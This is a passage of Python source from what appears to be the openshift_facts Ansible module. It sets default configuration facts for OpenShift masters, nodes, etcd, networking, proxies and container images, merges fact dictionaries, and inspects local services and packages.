if 'selector' not in facts['hosted']['registry'] or facts['hosted']['registry']['selector'] in [None, 'None']:
facts['hosted']['registry']['selector'] = selector
if 'metrics' not in facts['hosted']:
facts['hosted']['metrics'] = {}
if 'selector' not in facts['hosted']['metrics'] or facts['hosted']['metrics']['selector'] in [None, 'None']:
facts['hosted']['metrics']['selector'] = None
if 'logging' not in facts:
facts['logging'] = {}
if 'selector' not in facts['logging'] or facts['logging']['selector'] in [None, 'None']:
facts['logging']['selector'] = None
if 'etcd' not in facts['hosted']:
facts['hosted']['etcd'] = {}
if 'selector' not in facts['hosted']['etcd'] or facts['hosted']['etcd']['selector'] in [None, 'None']:
facts['hosted']['etcd']['selector'] = None
return facts
def set_dnsmasq_facts_if_unset(facts):
if 'common' in facts:
if 'master' in facts and 'dns_port' not in facts['master']:
facts['master']['dns_port'] = 8053
return facts
def set_project_cfg_facts_if_unset(facts):
config = {
'default_node_selector': '',
'project_request_message': '',
'project_request_template': '',
'mcs_allocator_range': 's0:/2',
'mcs_labels_per_project': 5,
'uid_allocator_range': '1000000000-1999999999/10000'
}
if 'master' in facts:
for key, value in config.items():
if key not in facts['master']:
facts['master'][key] = value
return facts
def set_identity_providers_if_unset(facts):
if 'master' in facts:
deployment_type = facts['common']['deployment_type']
if 'identity_providers' not in facts['master']:
identity_provider = dict(
name='allow_all', challenge=True, login=True,
kind='AllowAllPasswordIdentityProvider'
)
if deployment_type == 'openshift-enterprise':
identity_provider = dict(
name='deny_all', challenge=True, login=True,
kind='DenyAllPasswordIdentityProvider'
)
facts['master']['identity_providers'] = [identity_provider]
return facts
def set_url_facts_if_unset(facts):
if 'master' in facts:
hostname = facts['common']['hostname']
cluster_hostname = facts['master'].get('cluster_hostname')
cluster_public_hostname = facts['master'].get('cluster_public_hostname')
public_hostname = facts['common']['public_hostname']
api_hostname = cluster_hostname if cluster_hostname else hostname
api_public_hostname = cluster_public_hostname if cluster_public_hostname else public_hostname
console_path = facts['master']['console_path']
etcd_hosts = facts['master']['etcd_hosts']
use_ssl = dict(
api=facts['master']['api_use_ssl'],
public_api=facts['master']['api_use_ssl'],
loopback_api=facts['master']['api_use_ssl'],
console=facts['master']['console_use_ssl'],
public_console=facts['master']['console_use_ssl'],
etcd=facts['master']['etcd_use_ssl']
)
ports = dict(
api=facts['master']['api_port'],
public_api=facts['master']['api_port'],
loopback_api=facts['master']['api_port'],
console=facts['master']['console_port'],
public_console=facts['master']['console_port'],
etcd=facts['master']['etcd_port'],
)
etcd_urls = []
if etcd_hosts != '':
facts['master']['etcd_port'] = ports['etcd']
facts['master']['embedded_etcd'] = False
for host in etcd_hosts:
etcd_urls.append(format_url(use_ssl['etcd'], host,
ports['etcd']))
else:
etcd_urls = [format_url(use_ssl['etcd'], hostname,
ports['etcd'])]
facts['master'].setdefault('etcd_urls', etcd_urls)
prefix_hosts = [('api', api_hostname),
('public_api', api_public_hostname),
('loopback_api', hostname)]
for prefix, host in prefix_hosts:
facts['master'].setdefault(prefix + '_url', format_url(use_ssl[prefix],
host,
ports[prefix]))
r_lhn = "{0}:{1}".format(hostname, ports['api']).replace('.', '-')
r_lhu = "system:openshift-master/{0}:{1}".format(api_hostname, ports['api']).replace('.', '-')
facts['master'].setdefault('loopback_cluster_name', r_lhn)
facts['master'].setdefault('loopback_context_name', "default/{0}/system:openshift-master".format(r_lhn))
facts['master'].setdefault('loopback_user', r_lhu)
prefix_hosts = [('console', api_hostname), ('public_console', api_public_hostname)]
for prefix, host in prefix_hosts:
facts['master'].setdefault(prefix + '_url', format_url(use_ssl[prefix],
host,
ports[prefix],
console_path))
return facts
def set_aggregate_facts(facts):
all_hostnames = set()
internal_hostnames = set()
kube_svc_ip = first_ip(facts['common']['portal_net'])
if 'common' in facts:
all_hostnames.add(facts['common']['hostname'])
all_hostnames.add(facts['common']['public_hostname'])
all_hostnames.add(facts['common']['ip'])
all_hostnames.add(facts['common']['public_ip'])
facts['common']['kube_svc_ip'] = kube_svc_ip
internal_hostnames.add(facts['common']['hostname'])
internal_hostnames.add(facts['common']['ip'])
cluster_domain = facts['common']['dns_domain']
if 'master' in facts:
if 'cluster_hostname' in facts['master']:
all_hostnames.add(facts['master']['cluster_hostname'])
if 'cluster_public_hostname' in facts['master']:
all_hostnames.add(facts['master']['cluster_public_hostname'])
svc_names = ['openshift', 'openshift.default', 'openshift.default.svc',
'openshift.default.svc.' + cluster_domain, 'kubernetes', 'kubernetes.default',
'kubernetes.default.svc', 'kubernetes.default.svc.' + cluster_domain]
all_hostnames.update(svc_names)
internal_hostnames.update(svc_names)
all_hostnames.add(kube_svc_ip)
internal_hostnames.add(kube_svc_ip)
facts['common']['all_hostnames'] = list(all_hostnames)
facts['common']['internal_hostnames'] = list(internal_hostnames)
return facts
def set_etcd_facts_if_unset(facts):
if 'master' in facts and safe_get_bool(facts['master']['embedded_etcd']):
etcd_facts = facts['etcd'] if 'etcd' in facts else dict()
if 'etcd_data_dir' not in etcd_facts:
try:
# Parse master config to find actual etcd data dir:
master_cfg_path = os.path.join(facts['common']['config_base'],
'master/master-config.yaml')
master_cfg_f = open(master_cfg_path, 'r')
config = yaml.safe_load(master_cfg_f.read())
master_cfg_f.close()
etcd_facts['etcd_data_dir'] = \
config['etcdConfig']['storageDirectory']
facts['etcd'] = etcd_facts
# We don't want exceptions bubbling up here:
except Exception:
pass
else:
etcd_facts = facts['etcd'] if 'etcd' in facts else dict()
try:
ini_str = text_type('[root]\n' + open('/etc/etcd/etcd.conf', 'r').read(), 'utf-8')
ini_fp = io.StringIO(ini_str)
config = configparser.RawConfigParser()
config.readfp(ini_fp)
etcd_data_dir = config.get('root', 'ETCD_DATA_DIR')
if etcd_data_dir.startswith('"') and etcd_data_dir.endswith('"'):
etcd_data_dir = etcd_data_dir[1:-1]
etcd_facts['etcd_data_dir'] = etcd_data_dir
facts['etcd'] = etcd_facts
# pylint: disable=broad-except
except Exception:
pass
return facts
def set_deployment_facts_if_unset(facts):
# disabled to avoid breaking up facts related to deployment type into
# multiple methods for now.
# pylint: disable=too-many-statements, too-many-branches
if 'common' in facts:
deployment_type = facts['common']['deployment_type']
if 'service_type' not in facts['common']:
service_type = 'atomic-openshift'
if deployment_type == 'origin':
service_type = 'origin'
facts['common']['service_type'] = service_type
if 'docker' in facts:
deployment_type = facts['common']['deployment_type']
if deployment_type == 'openshift-enterprise':
addtl_regs = facts['docker'].get('additional_registries', [])
ent_reg = 'registry.access.redhat.com'
if ent_reg not in addtl_regs:
facts['docker']['additional_registries'] = addtl_regs + [ent_reg]
for role in ('master', 'node'):
if role in facts:
deployment_type = facts['common']['deployment_type']
if 'registry_url' not in facts[role]:
registry_url = 'openshift/origin-${component}:${version}'
if deployment_type == 'openshift-enterprise':
registry_url = 'openshift3/ose-${component}:${version}'
facts[role]['registry_url'] = registry_url
if 'master' in facts:
deployment_type = facts['common']['deployment_type']
openshift_features = ['Builder', 'S2IBuilder', 'WebConsole']
if 'disabled_features' not in facts['master']:
if facts['common']['deployment_subtype'] == 'registry':
facts['master']['disabled_features'] = openshift_features
if 'node' in facts:
deployment_type = facts['common']['deployment_type']
if 'storage_plugin_deps' not in facts['node']:
facts['node']['storage_plugin_deps'] = ['ceph', 'glusterfs', 'iscsi']
return facts
# pylint: disable=too-many-statements
def set_version_facts_if_unset(facts):
if 'common' in facts:
deployment_type = facts['common']['deployment_type']
openshift_version = get_openshift_version(facts)
if openshift_version and openshift_version != "latest":
version = LooseVersion(openshift_version)
facts['common']['version'] = openshift_version
facts['common']['short_version'] = '.'.join([str(x) for x in version.version[0:2]])
if deployment_type == 'origin':
version_gte_3_1_or_1_1 = version >= LooseVersion('1.1.0')
version_gte_3_1_1_or_1_1_1 = version >= LooseVersion('1.1.1')
version_gte_3_2_or_1_2 = version >= LooseVersion('1.2.0')
version_gte_3_3_or_1_3 = version >= LooseVersion('1.3.0')
version_gte_3_4_or_1_4 = version >= LooseVersion('1.4')
version_gte_3_5_or_1_5 = version >= LooseVersion('1.5')
version_gte_3_6 = version >= LooseVersion('3.6')
version_gte_3_7 = version >= LooseVersion('3.7')
else:
version_gte_3_1_or_1_1 = version >= LooseVersion('3.0.2.905')
version_gte_3_1_1_or_1_1_1 = version >= LooseVersion('3.1.1')
version_gte_3_2_or_1_2 = version >= LooseVersion('3.1.1.901')
version_gte_3_3_or_1_3 = version >= LooseVersion('3.3.0')
version_gte_3_4_or_1_4 = version >= LooseVersion('3.4')
version_gte_3_5_or_1_5 = version >= LooseVersion('3.5')
version_gte_3_6 = version >= LooseVersion('3.6')
version_gte_3_7 = version >= LooseVersion('3.7')
else:
# 'Latest' version is set to True, 'Next' versions set to False
version_gte_3_1_or_1_1 = True
version_gte_3_1_1_or_1_1_1 = True
version_gte_3_2_or_1_2 = True
version_gte_3_3_or_1_3 = True
version_gte_3_4_or_1_4 = True
version_gte_3_5_or_1_5 = True
version_gte_3_6 = True
version_gte_3_7 = False
facts['common']['version_gte_3_1_or_1_1'] = version_gte_3_1_or_1_1
facts['common']['version_gte_3_1_1_or_1_1_1'] = version_gte_3_1_1_or_1_1_1
facts['common']['version_gte_3_2_or_1_2'] = version_gte_3_2_or_1_2
facts['common']['version_gte_3_3_or_1_3'] = version_gte_3_3_or_1_3
facts['common']['version_gte_3_4_or_1_4'] = version_gte_3_4_or_1_4
facts['common']['version_gte_3_5_or_1_5'] = version_gte_3_5_or_1_5
facts['common']['version_gte_3_6'] = version_gte_3_6
facts['common']['version_gte_3_7'] = version_gte_3_7
if version_gte_3_7:
examples_content_version = 'v3.7'
elif version_gte_3_6:
examples_content_version = 'v3.6'
elif version_gte_3_5_or_1_5:
examples_content_version = 'v1.5'
elif version_gte_3_4_or_1_4:
examples_content_version = 'v1.4'
elif version_gte_3_3_or_1_3:
examples_content_version = 'v1.3'
elif version_gte_3_2_or_1_2:
examples_content_version = 'v1.2'
elif version_gte_3_1_or_1_1:
examples_content_version = 'v1.1'
else:
examples_content_version = 'v1.0'
facts['common']['examples_content_version'] = examples_content_version
return facts
def set_sdn_facts_if_unset(facts, system_facts):
if 'master' in facts:
# set defaults for sdn_cluster_network_cidr and sdn_host_subnet_length
# these might be overridden if they exist in the master config file
sdn_cluster_network_cidr = '10.128.0.0/14'
sdn_host_subnet_length = '9'
master_cfg_path = os.path.join(facts['common']['config_base'],
'master/master-config.yaml')
if os.path.isfile(master_cfg_path):
with open(master_cfg_path, 'r') as master_cfg_f:
config = yaml.safe_load(master_cfg_f.read())
if 'networkConfig' in config:
if 'clusterNetworkCIDR' in config['networkConfig']:
sdn_cluster_network_cidr = \
config['networkConfig']['clusterNetworkCIDR']
if 'hostSubnetLength' in config['networkConfig']:
sdn_host_subnet_length = \
config['networkConfig']['hostSubnetLength']
if 'sdn_cluster_network_cidr' not in facts['master']:
facts['master']['sdn_cluster_network_cidr'] = sdn_cluster_network_cidr
if 'sdn_host_subnet_length' not in facts['master']:
facts['master']['sdn_host_subnet_length'] = sdn_host_subnet_length
if 'node' in facts and 'sdn_mtu' not in facts['node']:
node_ip = facts['common']['ip']
# default MTU if interface MTU cannot be detected
facts['node']['sdn_mtu'] = '1450'
for val in itervalues(system_facts):
if isinstance(val, dict) and 'mtu' in val:
mtu = val['mtu']
if 'ipv4' in val and val['ipv4'].get('address') == node_ip:
facts['node']['sdn_mtu'] = str(mtu - 50)
return facts
def set_nodename(facts):
if 'node' in facts and 'common' in facts:
if 'cloudprovider' in facts and facts['cloudprovider']['kind'] == 'gce':
facts['node']['nodename'] = facts['provider']['metadata']['instance']['hostname'].split('.')[0]
# TODO: The openstack cloudprovider nodename setting was too opinionaed.
# It needs to be generalized before it can be enabled again.
# elif 'cloudprovider' in facts and facts['cloudprovider']['kind'] == 'openstack':
# facts['node']['nodename'] = facts['provider']['metadata']['hostname'].replace('.novalocal', '')
else:
facts['node']['nodename'] = facts['common']['hostname'].lower()
return facts
def migrate_oauth_template_facts(facts):
if 'master' in facts and 'oauth_template' in facts['master']:
if 'oauth_templates' not in facts['master']:
facts['master']['oauth_templates'] = {"login": facts['master']['oauth_template']}
elif 'login' not in facts['master']['oauth_templates']:
facts['master']['oauth_templates']['login'] = facts['master']['oauth_template']
return facts
def format_url(use_ssl, hostname, port, path=''):
scheme = 'https' if use_ssl else 'http'
netloc = hostname
if (use_ssl and port != '443') or (not use_ssl and port != '80'):
netloc += ":%s" % port
try:
url = urlparse.urlunparse((scheme, netloc, path, '', '', ''))
except AttributeError:
# pylint: disable=undefined-variable
url = urlunparse((scheme, netloc, path, '', '', ''))
return url
def get_current_config(facts):
current_config = dict()
roles = [role for role in facts if role not in ['common', 'provider']]
for role in roles:
if 'roles' in current_config:
current_config['roles'].append(role)
else:
current_config['roles'] = [role]
# TODO: parse the /etc/sysconfig/openshift-{master,node} config to
# determine the location of files.
# TODO: I suspect this isn't working right now, but it doesn't prevent
# anything from working properly as far as I can tell, perhaps because
# we override the kubeconfig path everywhere we use it?
# Query kubeconfig settings
kubeconfig_dir = '/var/lib/origin/openshift.local.certificates'
if role == 'node':
kubeconfig_dir = os.path.join(
kubeconfig_dir, "node-%s" % facts['common']['hostname']
)
kubeconfig_path = os.path.join(kubeconfig_dir, '.kubeconfig')
if os.path.isfile('/usr/bin/openshift') and os.path.isfile(kubeconfig_path):
try:
_, output, _ = module.run_command( # noqa: F405
["/usr/bin/openshift", "ex", "config", "view", "-o",
"json", "--kubeconfig=%s" % kubeconfig_path],
check_rc=False
)
config = json.loads(output)
cad = 'certificate-authority-data'
try:
for cluster in config['clusters']:
config['clusters'][cluster][cad] = 'masked'
except KeyError:
pass
try:
for user in config['users']:
config['users'][user][cad] = 'masked'
config['users'][user]['client-key-data'] = 'masked'
except KeyError:
pass
current_config['kubeconfig'] = config
# override pylint broad-except warning, since we do not want
# to bubble up any exceptions if oc config view
# fails
# pylint: disable=broad-except
except Exception:
pass
return current_config
def build_kubelet_args(facts):
cloud_cfg_path = os.path.join(
facts['common']['config_base'],
'cloudprovider')
# We only have to do this stuff on hosts that are nodes
if 'node' in facts:
# Any changes to the kubeletArguments parameter are stored
# here first.
kubelet_args = {}
if 'cloudprovider' in facts:
# EVERY cloud is special <3
if 'kind' in facts['cloudprovider']:
if facts['cloudprovider']['kind'] == 'aws':
kubelet_args['cloud-provider'] = ['aws']
kubelet_args['cloud-config'] = [cloud_cfg_path + '/aws.conf']
if facts['cloudprovider']['kind'] == 'openstack':
kubelet_args['cloud-provider'] = ['openstack']
kubelet_args['cloud-config'] = [cloud_cfg_path + '/openstack.conf']
if facts['cloudprovider']['kind'] == 'gce':
kubelet_args['cloud-provider'] = ['gce']
kubelet_args['cloud-config'] = [cloud_cfg_path + '/gce.conf']
# Automatically add node-labels to the kubeletArguments
# parameter. See BZ1359848 for additional details.
#
# Ref: https://bugzilla.redhat.com/show_bug.cgi?id=1359848
if 'labels' in facts['node'] and isinstance(facts['node']['labels'], dict):
# tl;dr: os_node_labels="{'foo': 'bar', 'a': 'b'}" turns
# into ['foo=bar', 'a=b']
#
# On the openshift_node_labels inventory variable we loop
# over each key-value tuple (from .items()) and join the
# key to the value with an '=' character, this produces a
# list.
#
# map() seems to be returning an itertools.imap object
# instead of a list. We cast it to a list ourselves.
# pylint: disable=unnecessary-lambda
labels_str = list(map(lambda x: '='.join(x), facts['node']['labels'].items()))
if labels_str != '':
kubelet_args['node-labels'] = labels_str
# If we've added items to the kubelet_args dict then we need
if kubelet_args != {}:
facts = merge_facts({'node': {'kubelet_args': kubelet_args}}, facts, [], [])
return facts
def build_controller_args(facts):
cloud_cfg_path = os.path.join(facts['common']['config_base'],
'cloudprovider')
if 'master' in facts:
controller_args = {}
if 'cloudprovider' in facts:
if 'kind' in facts['cloudprovider']:
if facts['cloudprovider']['kind'] == 'aws':
controller_args['cloud-provider'] = ['aws']
controller_args['cloud-config'] = [cloud_cfg_path + '/aws.conf']
if facts['cloudprovider']['kind'] == 'openstack':
controller_args['cloud-provider'] = ['openstack']
controller_args['cloud-config'] = [cloud_cfg_path + '/openstack.conf']
if facts['cloudprovider']['kind'] == 'gce':
controller_args['cloud-provider'] = ['gce']
controller_args['cloud-config'] = [cloud_cfg_path + '/gce.conf']
if controller_args != {}:
facts = merge_facts({'master': {'controller_args': controller_args}}, facts, [], [])
return facts
def build_api_server_args(facts):
cloud_cfg_path = os.path.join(facts['common']['config_base'],
'cloudprovider')
if 'master' in facts:
api_server_args = {}
if 'cloudprovider' in facts:
if 'kind' in facts['cloudprovider']:
if facts['cloudprovider']['kind'] == 'aws':
api_server_args['cloud-provider'] = ['aws']
api_server_args['cloud-config'] = [cloud_cfg_path + '/aws.conf']
if facts['cloudprovider']['kind'] == 'openstack':
api_server_args['cloud-provider'] = ['openstack']
api_server_args['cloud-config'] = [cloud_cfg_path + '/openstack.conf']
if facts['cloudprovider']['kind'] == 'gce':
api_server_args['cloud-provider'] = ['gce']
api_server_args['cloud-config'] = [cloud_cfg_path + '/gce.conf']
if api_server_args != {}:
facts = merge_facts({'master': {'api_server_args': api_server_args}}, facts, [], [])
return facts
def is_service_running(service):
service_running = False
try:
bus = SystemBus()
systemd = bus.get_object('org.freedesktop.systemd1', '/org/freedesktop/systemd1')
manager = Interface(systemd, dbus_interface='org.freedesktop.systemd1.Manager')
service_unit = service if service.endswith('.service') else manager.GetUnit('{0}.service'.format(service))
service_proxy = bus.get_object('org.freedesktop.systemd1', str(service_unit))
service_properties = Interface(service_proxy, dbus_interface='org.freedesktop.DBus.Properties')
service_load_state = service_properties.Get('org.freedesktop.systemd1.Unit', 'LoadState')
service_active_state = service_properties.Get('org.freedesktop.systemd1.Unit', 'ActiveState')
if service_load_state == 'loaded' and service_active_state == 'active':
service_running = True
except DBusException:
pass
return service_running
def rpm_rebuilddb():
module.run_command(['/usr/bin/rpm', '--rebuilddb'])
def get_version_output(binary, version_cmd):
cmd = []
for item in (binary, version_cmd):
if isinstance(item, list):
cmd.extend(item)
else:
cmd.append(item)
if os.path.isfile(cmd[0]):
_, output, _ = module.run_command(cmd)
return output
def get_docker_version_info():
result = None
if is_service_running('docker') or is_service_running('container-engine'):
version_info = yaml.safe_load(get_version_output('/usr/bin/docker', 'version'))
if 'Server' in version_info:
result = {
'api_version': version_info['Server']['API version'],
'version': version_info['Server']['Version']
}
return result
def get_hosted_registry_insecure():
hosted_registry_insecure = None
if os.path.exists('/etc/sysconfig/docker'):
try:
ini_str = text_type('[root]\n' + open('/etc/sysconfig/docker', 'r').read(), 'utf-8')
ini_fp = io.StringIO(ini_str)
config = configparser.RawConfigParser()
config.readfp(ini_fp)
options = config.get('root', 'OPTIONS')
if 'insecure-registry' in options:
hosted_registry_insecure = True
except Exception:
pass
return hosted_registry_insecure
def get_openshift_version(facts):
version = None
if 'common' in facts:
if 'version' in facts['common'] and facts['common']['version'] is not None:
return chomp_commit_offset(facts['common']['version'])
if os.path.isfile('/usr/bin/openshift'):
_, output, _ = module.run_command(['/usr/bin/openshift', 'version'])
version = parse_openshift_version(output)
elif 'common' in facts and 'is_containerized' in facts['common']:
version = get_container_openshift_version(facts)
if not version and os.path.isfile('/usr/local/bin/openshift'):
_, output, _ = module.run_command(['/usr/local/bin/openshift', 'version'])
version = parse_openshift_version(output)
return chomp_commit_offset(version)
def chomp_commit_offset(version):
if version is None:
return version
else:
# return the first split. No concerns about strings without a
# '+', .split() returns an array of the original string.
return str(version).split('+')[0]
def get_container_openshift_version(facts):
for filename in ['/etc/sysconfig/%s-master', '/etc/sysconfig/%s-node']:
env_path = filename % facts['common']['service_type']
if not os.path.exists(env_path):
continue
with open(env_path) as env_file:
for line in env_file:
if line.startswith("IMAGE_VERSION="):
tag = line[len("IMAGE_VERSION="):].strip()
# Remove leading "v" and any trailing release info, we just want
# a version number here:
no_v_version = tag[1:] if tag[0] == 'v' else tag
version = no_v_version.split("-")[0]
return version
return None
def parse_openshift_version(output):
versions = dict(e.split(' v') for e in output.splitlines() if ' v' in e)
ver = versions.get('openshift', '')
# Remove trailing build number and commit hash from older versions, we need to return a straight
# w.x.y.z version here for use as openshift_version throughout the playbooks/roles. (i.e. 3.1.1.6-64-g80b61da)
ver = ver.split('-')[0]
return ver
def apply_provider_facts(facts, provider_facts):
if not provider_facts:
return facts
common_vars = [('hostname', 'ip'), ('public_hostname', 'public_ip')]
for h_var, ip_var in common_vars:
ip_value = provider_facts['network'].get(ip_var)
if ip_value:
facts['common'][ip_var] = ip_value
facts['common'][h_var] = choose_hostname(
[provider_facts['network'].get(h_var)],
facts['common'][h_var]
)
facts['provider'] = provider_facts
return facts
# Disabling pylint too many branches. This function needs refactored
# but is a very core part of openshift_facts.
# pylint: disable=too-many-branches, too-many-nested-blocks
def merge_facts(orig, new, additive_facts_to_overwrite, protected_facts_to_overwrite):
additive_facts = ['named_certificates']
protected_facts = ['ha']
# Facts we do not ever want to merge. These originate in inventory variables
# and contain JSON dicts. We don't ever want to trigger a merge
inventory_json_facts = ['admission_plugin_config',
'kube_admission_plugin_config',
'image_policy_config',
"builddefaults",
"buildoverrides"]
facts = dict()
for key, value in iteritems(orig):
if key in new:
if key in inventory_json_facts:
if isinstance(new[key], string_types):
facts[key] = yaml.safe_load(new[key])
else:
facts[key] = copy.deepcopy(new[key])
elif isinstance(value, dict) and isinstance(new[key], dict):
relevant_additive_facts = []
for item in additive_facts_to_overwrite:
if '.' in item and item.startswith(key + '.'):
relevant_additive_facts.append(item)
relevant_protected_facts = []
for item in protected_facts_to_overwrite:
if '.' in item and item.startswith(key + '.'):
relevant_protected_facts.append(item)
facts[key] = merge_facts(value, new[key], relevant_additive_facts, relevant_protected_facts)
elif key in additive_facts and key not in [x.split('.')[-1] for x in additive_facts_to_overwrite]:
if isinstance(value, list) and isinstance(new[key], list):
new_fact = []
for item in copy.deepcopy(value) + copy.deepcopy(new[key]):
if item not in new_fact:
new_fact.append(item)
facts[key] = new_fact
elif key in protected_facts and key not in [x.split('.')[-1] for x in protected_facts_to_overwrite]:
if key == 'ha':
if safe_get_bool(value) != safe_get_bool(new[key]):
module.fail_json(msg='openshift_facts received a different value for openshift.master.ha')
else:
facts[key] = value
else:
facts[key] = copy.deepcopy(new[key])
else:
facts[key] = copy.deepcopy(value)
new_keys = set(new.keys()) - set(orig.keys())
for key in new_keys:
# Watchout for JSON facts that sometimes load as strings.
# (can happen if the JSON contains a boolean)
if key in inventory_json_facts and isinstance(new[key], string_types):
facts[key] = yaml.safe_load(new[key])
else:
facts[key] = copy.deepcopy(new[key])
return facts
def save_local_facts(filename, facts):
try:
fact_dir = os.path.dirname(filename)
try:
os.makedirs(fact_dir) # try to make the directory
except OSError as exception:
if exception.errno != errno.EEXIST: # but it is okay if it is already there
raise # pass any other exceptions up the chain
with open(filename, 'w') as fact_file:
fact_file.write(module.jsonify(facts)) # noqa: F405
os.chmod(filename, 0o600)
except (IOError, OSError) as ex:
raise OpenShiftFactsFileWriteError(
"Could not create fact file: %s, error: %s" % (filename, ex)
)
def get_local_facts_from_file(filename):
local_facts = dict()
try:
# Handle conversion of INI style facts file to json style
ini_facts = configparser.SafeConfigParser()
ini_facts.read(filename)
for section in ini_facts.sections():
local_facts[section] = dict()
for key, value in ini_facts.items(section):
local_facts[section][key] = value
except (configparser.MissingSectionHeaderError,
configparser.ParsingError):
try:
with open(filename, 'r') as facts_file:
local_facts = json.load(facts_file)
except (ValueError, IOError):
pass
return local_facts
def sort_unique(alist):
return sorted(list(set(alist)))
def safe_get_bool(fact):
return bool(strtobool(str(fact)))
def set_proxy_facts(facts):
if 'common' in facts:
common = facts['common']
if 'http_proxy' in common or 'https_proxy' in common or 'no_proxy' in common:
if 'no_proxy' in common and isinstance(common['no_proxy'], string_types):
common['no_proxy'] = common['no_proxy'].split(",")
elif 'no_proxy' not in common:
common['no_proxy'] = []
# See https://bugzilla.redhat.com/show_bug.cgi?id=1466783
# masters behind a proxy need to connect to etcd via IP
if 'no_proxy_etcd_host_ips' in common:
if isinstance(common['no_proxy_etcd_host_ips'], string_types):
common['no_proxy'].extend(common['no_proxy_etcd_host_ips'].split(','))
if 'generate_no_proxy_hosts' in common and safe_get_bool(common['generate_no_proxy_hosts']):
if 'no_proxy_internal_hostnames' in common:
common['no_proxy'].extend(common['no_proxy_internal_hostnames'].split(','))
# We always add local dns domain and ourselves no matter what
common['no_proxy'].append('.' + common['dns_domain'])
common['no_proxy'].append('.svc')
common['no_proxy'].append(common['hostname'])
common['no_proxy'] = ','.join(sort_unique(common['no_proxy']))
facts['common'] = common
return facts
def set_builddefaults_facts(facts):
if 'builddefaults' in facts:
builddefaults = facts['builddefaults']
common = facts['common']
# Copy values from common to builddefaults
if 'http_proxy' not in builddefaults and 'http_proxy' in common:
builddefaults['http_proxy'] = common['http_proxy']
if 'https_proxy' not in builddefaults and 'https_proxy' in common:
builddefaults['https_proxy'] = common['https_proxy']
if 'no_proxy' not in builddefaults and 'no_proxy' in common:
builddefaults['no_proxy'] = common['no_proxy']
# Create git specific facts from generic values, if git specific values are
# not defined.
if 'git_http_proxy' not in builddefaults and 'http_proxy' in builddefaults:
builddefaults['git_http_proxy'] = builddefaults['http_proxy']
if 'git_https_proxy' not in builddefaults and 'https_proxy' in builddefaults:
builddefaults['git_https_proxy'] = builddefaults['https_proxy']
if 'git_no_proxy' not in builddefaults and 'no_proxy' in builddefaults:
builddefaults['git_no_proxy'] = builddefaults['no_proxy']
# If we're actually defining a builddefaults config then create admission_plugin_config
if 'config' in builddefaults:
if 'admission_plugin_config' not in facts['master']:
facts['master']['admission_plugin_config'] = {'BuildDefaults': {'configuration': {'env': {}}}}
facts['master']['admission_plugin_config'].update(builddefaults['config'])
delete_empty_keys(facts['master']['admission_plugin_config']['BuildDefaults']['configuration']['env'])
return facts
def delete_empty_keys(keylist):
count = 0
for i in range(0, len(keylist)):
if len(keylist[i - count]['value']) == 0:
del keylist[i - count]
count += 1
def set_buildoverrides_facts(facts):
if 'buildoverrides' in facts:
buildoverrides = facts['buildoverrides']
# then merge buildoverrides[config] structure into admission_plugin_config
if 'config' in buildoverrides:
if 'admission_plugin_config' not in facts['master']:
facts['master']['admission_plugin_config'] = dict()
facts['master']['admission_plugin_config'].update(buildoverrides['config'])
return facts
# pylint: disable=too-many-statements
def set_container_facts_if_unset(facts):
deployment_type = facts['common']['deployment_type']
if deployment_type == 'openshift-enterprise':
master_image = 'openshift3/ose'
cli_image = master_image
node_image = 'openshift3/node'
ovs_image = 'openshift3/openvswitch'
etcd_image = 'registry.access.redhat.com/rhel7/etcd'
pod_image = 'openshift3/ose-pod'
router_image = 'openshift3/ose-haproxy-router'
registry_image = 'openshift3/ose-docker-registry'
deployer_image = 'openshift3/ose-deployer'
else:
master_image = 'openshift/origin'
cli_image = master_image
node_image = 'openshift/node'
ovs_image = 'openshift/openvswitch'
etcd_image = 'registry.access.redhat.com/rhel7/etcd'
pod_image = 'openshift/origin-pod'
router_image = 'openshift/origin-haproxy-router'
registry_image = 'openshift/origin-docker-registry'
deployer_image = 'openshift/origin-deployer'
facts['common']['is_atomic'] = os.path.isfile('/run/ostree-booted')
# If openshift_docker_use_system_container is set and is True ....
if 'use_system_container' in list(facts['docker'].keys()):
if facts['docker']['use_system_container']:
# ... set the service name to container-engine
facts['docker']['service_name'] = 'container-engine'
if 'is_containerized' not in facts['common']:
facts['common']['is_containerized'] = facts['common']['is_atomic']
if 'cli_image' not in facts['common']:
facts['common']['cli_image'] = cli_image
if 'pod_image' not in facts['common']:
facts['common']['pod_image'] = pod_image
if 'router_image' not in facts['common']:
facts['common']['router_image'] = router_image
if 'registry_image' not in facts['common']:
facts['common']['registry_image'] = registry_image
if 'deployer_image' not in facts['common']:
facts['common']['deployer_image'] = deployer_image
if 'etcd' in facts and 'etcd_image' not in facts['etcd']:
facts['etcd']['etcd_image'] = etcd_image
if 'master' in facts and 'master_image' not in facts['master']:
facts['master']['master_image'] = master_image
facts['master']['master_system_image'] = master_image
if 'node' in facts:
if 'node_image' not in facts['node']:
facts['node']['node_image'] = node_image
facts['node']['node_system_image'] = node_image
if 'ovs_image' not in facts['node']:
facts['node']['ovs_image'] = ovs_image
facts['node']['ovs_system_image'] = ovs_image
if safe_get_bool(facts['common']['is_containerized']):
facts['common']['admin_binary'] = '/usr/local/bin/oadm'
facts['common']['client_binary'] = '/usr/local/bin/oc'
return facts
def set_installed_variant_rpm_facts(facts):
installed_rpms = []
for base_rpm in ['openshift', 'atomic-openshift', 'origin']:
optional_rpms = ['master', 'node', 'clients', 'sdn-ovs']
variant_rpms = [base_rpm] + \
['{0}-{1}'.format(base_rpm, r) for r in optional_rpms] + \
['tuned-profiles-%s-node' % base_rpm]
for rpm in variant_rpms:
exit_code, _, _ = module.run_command(['rpm', '-q', rpm]) # noqa: F405
if exit_code == 0:
installed_rpms.append(rpm)
facts['common']['installed_variant_rpms'] = installed_rpms
return facts
class OpenShiftFactsInternalError(Exception):
pass
class OpenShiftFactsUnsupportedRoleError(Exception):
pass
class OpenShiftFactsFileWriteError(Exception):
pass
class OpenShiftFactsMetadataUnavailableError(Exception):
pass
class OpenShiftFacts(object):
known_roles = ['builddefaults',
'buildoverrides',
'cloudprovider',
'common',
'docker',
'etcd',
'hosted',
'master',
'node',
'logging',
'loggingops',
'metrics']
# Disabling too-many-arguments, this should be cleaned up as a TODO item.
# pylint: disable=too-many-arguments,no-value-for-parameter
def __init__(self, role, filename, local_facts,
additive_facts_to_overwrite=None,
openshift_env=None,
openshift_env_structures=None,
protected_facts_to_overwrite=None):
self.changed = False
self.filename = filename
if role not in self.known_roles:
raise OpenShiftFactsUnsupportedRoleError(
"Role %s is not supported by this module" % role
)
self.role = role
# Collect system facts and preface each fact with 'ansible_'.
try:
# pylint: disable=too-many-function-args,invalid-name
